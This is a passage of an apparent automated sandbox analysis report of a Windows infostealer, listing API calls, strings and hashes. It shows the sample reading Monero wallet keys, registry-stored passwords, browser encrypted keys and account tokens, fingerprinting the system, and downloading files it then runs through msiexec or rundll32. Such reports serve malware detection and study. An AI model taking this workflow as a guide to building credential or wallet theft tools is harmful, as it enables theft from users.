                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: d8d22a2592be5820578d1949ed403e5a4aef997cba9b8648e190610094ef0803
                  • Instruction ID: 7bd58527d07835e0e61ee16a699d9dc4f8f0320e93a7ec4eb989481f355e22f0
                  • Opcode Fuzzy Hash: d8d22a2592be5820578d1949ed403e5a4aef997cba9b8648e190610094ef0803
                  • Instruction Fuzzy Hash: 76122D71C00108AADB19FBA0DE92FEEB778AF94310F504159F50676591EF342B4ACFA6
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A6280: InternetOpenA.WININET(009C0DFE,00000001,00000000,00000000,00000000), ref: 009A62E1
                    • Part of subcall function 009A6280: StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6303
                    • Part of subcall function 009A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A6335
                    • Part of subcall function 009A6280: HttpOpenRequestA.WININET(00000000,GET,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A6385
                    • Part of subcall function 009A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009A63BF
                    • Part of subcall function 009A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A63D1
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5318
                  • lstrlen.KERNEL32(00000000), ref: 009B532F
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 009B5364
                  • lstrlen.KERNEL32(00000000), ref: 009B5383
                  • lstrlen.KERNEL32(00000000), ref: 009B53AE
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 90e0f8173c3eaa3b72313e7b1f276cb96662967fb0a9618054fa2cde078ce486
                  • Instruction ID: e5c0a9f629cb90c6423eef759d02a10e68f547507c61ab2f5372e5c786a1d8ab
                  • Opcode Fuzzy Hash: 90e0f8173c3eaa3b72313e7b1f276cb96662967fb0a9618054fa2cde078ce486
                  • Instruction Fuzzy Hash: 51512030910148ABCB24FF60CEA6FED7779AF91721F504018F4066B592EF746B46CBA6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 10bc10f4179af1bb9050b468ed556afdd773f35113d4bce0518ea277514cc4ee
                  • Instruction ID: ef82bd6bfd396fbaae0ce5ed489010e2a7ac9d7d189893c4671da5bf0d1e3e77
                  • Opcode Fuzzy Hash: 10bc10f4179af1bb9050b468ed556afdd773f35113d4bce0518ea277514cc4ee
                  • Instruction Fuzzy Hash: 24C1A5B590021DABCB14EF60DDD9FEE7378BB98314F004599E50A67281DF70AA85CFA1
                  APIs
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B42EC
                  • lstrcat.KERNEL32(?,015EED70), ref: 009B430B
                  • lstrcat.KERNEL32(?,?), ref: 009B431F
                  • lstrcat.KERNEL32(?,015EE300), ref: 009B4333
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009B8D90: GetFileAttributesA.KERNEL32(00000000,?,009A1B54,?,?,009C564C,?,?,009C0E1F), ref: 009B8D9F
                    • Part of subcall function 009A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009A9D39
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B93C0: GlobalAlloc.KERNEL32(00000000,009B43DD,009B43DD), ref: 009B93D3
                  • StrStrA.SHLWAPI(?,015EED58), ref: 009B43F3
                  • GlobalFree.KERNEL32(?), ref: 009B4512
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9AEF
                    • Part of subcall function 009A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009A4EEE,00000000,?), ref: 009A9B01
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9B2A
                    • Part of subcall function 009A9AC0: LocalFree.KERNEL32(?,?,?,?,009A4EEE,00000000,?), ref: 009A9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 009B44A3
                  • StrCmpCA.SHLWAPI(?,009C08D1), ref: 009B44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009B44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 009B44E5
                  • lstrcat.KERNEL32(00000000,009C0FB8), ref: 009B44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 01398a7b6a6951b7728476629a2b396ff0de6345ce62e7ca4966b9d1a7540ffd
                  • Instruction ID: 1de741367cad22e6eec7ff389754fdbe669033d1ec9d44a8ea32f5c14a9edad1
                  • Opcode Fuzzy Hash: 01398a7b6a6951b7728476629a2b396ff0de6345ce62e7ca4966b9d1a7540ffd
                  • Instruction Fuzzy Hash: 0F7145B6D00208BBDB14EBA0DD85FEE777DAB88310F004598F60597181EE75EB45CB91
                  APIs
                    • Part of subcall function 009A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A12B4
                    • Part of subcall function 009A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 009A12BB
                    • Part of subcall function 009A12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009A12D7
                    • Part of subcall function 009A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009A12F5
                    • Part of subcall function 009A12A0: RegCloseKey.ADVAPI32(?), ref: 009A12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 009A134F
                  • lstrlen.KERNEL32(?), ref: 009A135C
                  • lstrcat.KERNEL32(?,.keys), ref: 009A1377
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 009A1465
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 009A14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: a89152d7ccb6d68b24dcec253436f125d60237e1431b200b9d88ba839cbb0952
                  • Instruction ID: 36491914b9cd12d16f1b70dc6fc796302e15d1e26f624eff811bd24daf7e6e5c
                  • Opcode Fuzzy Hash: a89152d7ccb6d68b24dcec253436f125d60237e1431b200b9d88ba839cbb0952
                  • Instruction Fuzzy Hash: 945157B1D501196BCB15FB60DDA1FED737CAF94710F404198B60A67091EE306B89CFA6
                  APIs
                    • Part of subcall function 009A72D0: memset.MSVCRT ref: 009A7314
                    • Part of subcall function 009A72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009A733A
                    • Part of subcall function 009A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009A73B1
                    • Part of subcall function 009A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009A740D
                    • Part of subcall function 009A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 009A7452
                    • Part of subcall function 009A72D0: HeapFree.KERNEL32(00000000), ref: 009A7459
                  • lstrcat.KERNEL32(00000000,009C17FC), ref: 009A7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009A7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 009A765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009A768F
                  • lstrcat.KERNEL32(00000000,009C1804), ref: 009A76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009A76D3
                  • lstrcat.KERNEL32(00000000,009C1808), ref: 009A76ED
                  • task.LIBCPMTD ref: 009A76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: d4ff5a68927f3f46f3fd9cda3c2fe66a23b35b9a8b036dd8d8e59fa7b3d83ccd
                  • Instruction ID: de771e3dab974b32e5ce0157fffcc0c820bc40edf3e3ec4fac0f10cce8cf3e94
                  • Opcode Fuzzy Hash: d4ff5a68927f3f46f3fd9cda3c2fe66a23b35b9a8b036dd8d8e59fa7b3d83ccd
                  • Instruction Fuzzy Hash: B131EB71D04149EFCB04EBE4DC96EEFB779AB86701B144518F102AB291DE34B946CB92
                  APIs
                  • memset.MSVCRT ref: 009A7314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009A733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009A73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009A740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009A7452
                  • HeapFree.KERNEL32(00000000), ref: 009A7459
                  • task.LIBCPMTD ref: 009A7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: 5a33c50015ea1c7293429c6fab94379c2edac611e2ad28714673b2575d9196d4
                  • Instruction ID: 0a196b1ab03836c0867c996e60187d83fb4b927431f901074e2ae298ccdb559f
                  • Opcode Fuzzy Hash: 5a33c50015ea1c7293429c6fab94379c2edac611e2ad28714673b2575d9196d4
                  • Instruction Fuzzy Hash: F06109B5D042689BDB24DB50CC45BDAB7BCBF89304F0081E9E649A6141EB706BC9CFA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015EF298,00000000,?,009C0E2C,00000000,?,00000000), ref: 009B8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009B8158
                  • __aulldiv.LIBCMT ref: 009B8172
                  • __aulldiv.LIBCMT ref: 009B8180
                  • wsprintfA.USER32 ref: 009B81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 7513d654d497932412e1a48cf498f2cd27c9bb387656c023e463c117d8c717ba
                  • Instruction ID: 687a249a3d712953fe80b0350aac56fdc085d295d8ced718eb173e7e5ce38172
                  • Opcode Fuzzy Hash: 7513d654d497932412e1a48cf498f2cd27c9bb387656c023e463c117d8c717ba
                  • Instruction Fuzzy Hash: 5921C9B1E44258ABDB00DFD4DD49FAFBBBCEB48B14F104519F605BB280DB7869018BA5
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                  • InternetOpenA.WININET(009C0DF7,00000001,00000000,00000000,00000000), ref: 009A610F
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009A618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009A61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 009A61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009A620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 009A6249
                  • InternetCloseHandle.WININET(?), ref: 009A6253
                  • InternetCloseHandle.WININET(00000000), ref: 009A6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 337f1674a3c7e3506b29f70741117c93c7e740bd28a0eb4573c60038c4c17bab
                  • Instruction ID: 58bd18e5efee3cf249bf3b74066e29e9a3fba5f70eb4c7c8f9f805030e68346c
                  • Opcode Fuzzy Hash: 337f1674a3c7e3506b29f70741117c93c7e740bd28a0eb4573c60038c4c17bab
                  • Instruction Fuzzy Hash: 705140B1900218ABDF20DFA0DD89BEE77B8FB45705F108498B605AB1C1DB746E85CFA5
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  • lstrlen.KERNEL32(00000000), ref: 009ABC9F
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 009ABCCD
                  • lstrlen.KERNEL32(00000000), ref: 009ABDA5
                  • lstrlen.KERNEL32(00000000), ref: 009ABDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 78608b69a567fe05ee81ce9761930b4e43cd6b6aebbe193fc8c2b2b70c29b382
                  • Instruction ID: d7116f51c3d24809ffd246f1bdfa23a20f0ed215d744c87083d872da2e885959
                  • Opcode Fuzzy Hash: 78608b69a567fe05ee81ce9761930b4e43cd6b6aebbe193fc8c2b2b70c29b382
                  • Instruction Fuzzy Hash: D9B13D71910108ABDB14FBA0DE96FEE733DAF94314F404168F506A7492EF346E49CBA6
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 53cf13e9edd3bf30000fa3739547d1c399ed8d693afc02088f92bb48305d2386
                  • Instruction ID: 1cd947de59b49527b8b5818ac6bef19ba19a82556fe90b3ff63aa12873b17d64
                  • Opcode Fuzzy Hash: 53cf13e9edd3bf30000fa3739547d1c399ed8d693afc02088f92bb48305d2386
                  • Instruction Fuzzy Hash: 2BF05E34908289EFD344DFE4E98976C7B78FB04713F040198E6098B290DE746F41AB96
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009A4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A4FD1
                  • InternetOpenA.WININET(009C0DDF,00000000,00000000,00000000,00000000), ref: 009A4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 009A5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 009A5041
                  • InternetCloseHandle.WININET(?), ref: 009A50B9
                  • InternetCloseHandle.WININET(?), ref: 009A50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 2f9fc7381939fb8a5ae5e5ed69a6c96bbfa19d520e5ccb55553671705fd2752f
                  • Instruction ID: c985d8cafe066ce5d185fc2caf637b6eb53b0f43a10c5ac7c33e7984bc58ca11
                  • Opcode Fuzzy Hash: 2f9fc7381939fb8a5ae5e5ed69a6c96bbfa19d520e5ccb55553671705fd2752f
                  • Instruction Fuzzy Hash: 6131F8B4A40218ABDB20CF54DD85BDCB7B8EB48704F1081D9FB09A7281DB746EC58F99
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009B8426
                  • wsprintfA.USER32 ref: 009B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B8499
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  • RegQueryValueExA.ADVAPI32(00000000,015EF208,00000000,000F003F,?,00000400), ref: 009B84EC
                  • lstrlen.KERNEL32(?), ref: 009B8501
                  • RegQueryValueExA.ADVAPI32(00000000,015EF1A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,009C0B34), ref: 009B8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: bca225e49612631efa066bf6322b3a29ea53055f83bac8840a9a902402e0bcbf
                  • Instruction ID: a4e4308ed63e4e481a817cf533a1a8e406455192911e15b027730386932f2e3b
                  • Opcode Fuzzy Hash: bca225e49612631efa066bf6322b3a29ea53055f83bac8840a9a902402e0bcbf
                  • Instruction Fuzzy Hash: A121E7B1910218ABDB24DB54DD85FE9B7BDFB48710F00C598A609A7180DF716A85CFE4
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,015DC420,00000000,00020119,00000000), ref: 009B76DD
                  • RegQueryValueExA.ADVAPI32(00000000,015EF220,00000000,00000000,?,000000FF), ref: 009B76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 0e42e76201e8482ff12bb6a56600b901739aa8fb58a5289cb574d7599613ea8e
                  • Instruction ID: e95ad1bd09a3063c468980a83c8bac4ac75cc4f4bda941b683040966c3a2a40f
                  • Opcode Fuzzy Hash: 0e42e76201e8482ff12bb6a56600b901739aa8fb58a5289cb574d7599613ea8e
                  • Instruction Fuzzy Hash: C0014FB5A04208BBDB00DBE4DDC9FA9B7BCEB88701F104554FA059B290EE74A9048B52
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B773B
                  • RegOpenKeyExA.ADVAPI32(80000002,015DC420,00000000,00020119,009B76B9), ref: 009B775B
                  • RegQueryValueExA.ADVAPI32(009B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 009B777A
                  • RegCloseKey.ADVAPI32(009B76B9), ref: 009B7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 35f163c41fa13229779c1e5f0ab6bcdabdb8f1a135da106228279c381c9ecb52
                  • Instruction ID: 949e273d326f48005ca3f9640a73c09e10c90ab87ea954fe3b1af4b11f2d81de
                  • Opcode Fuzzy Hash: 35f163c41fa13229779c1e5f0ab6bcdabdb8f1a135da106228279c381c9ecb52
                  • Instruction Fuzzy Hash: D30117B5A40348BBDB10DBE4DC89FAEB7BCEB48705F104559FA05AB281DE746A00CF52
                  APIs
                  • memset.MSVCRT ref: 009B40D5
                  • RegOpenKeyExA.ADVAPI32(80000001,015EE708,00000000,00020119,?), ref: 009B40F4
                  • RegQueryValueExA.ADVAPI32(?,015EEDA0,00000000,00000000,00000000,000000FF), ref: 009B4118
                  • RegCloseKey.ADVAPI32(?), ref: 009B4122
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4147
                  • lstrcat.KERNEL32(?,015EEC20), ref: 009B415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: e3779450b2ac340b77b8e5907d2c339b0702bbdaae2dcb8ddaa82b0130a4daa5
                  • Instruction ID: 6008cfbf89fd457f0d23774b1c6534b4c8df0e74c8357244d298a9f0c51fea59
                  • Opcode Fuzzy Hash: e3779450b2ac340b77b8e5907d2c339b0702bbdaae2dcb8ddaa82b0130a4daa5
                  • Instruction Fuzzy Hash: 5A419CB6D101086BDB14EBE0DC96FFE737DA7C8300F004559B6165B181EE75AB888BD2
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                  • LocalFree.KERNEL32(009A148F), ref: 009A9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 48cde4cfeadf20c45854af154feb7ff44ff7a2bff8ffcaf3195e06cdf058081d
                  • Instruction ID: d15be703412b474ae392b173ca0dde1e4498a7cde1531a4c6655f7667d03a430
                  • Opcode Fuzzy Hash: 48cde4cfeadf20c45854af154feb7ff44ff7a2bff8ffcaf3195e06cdf058081d
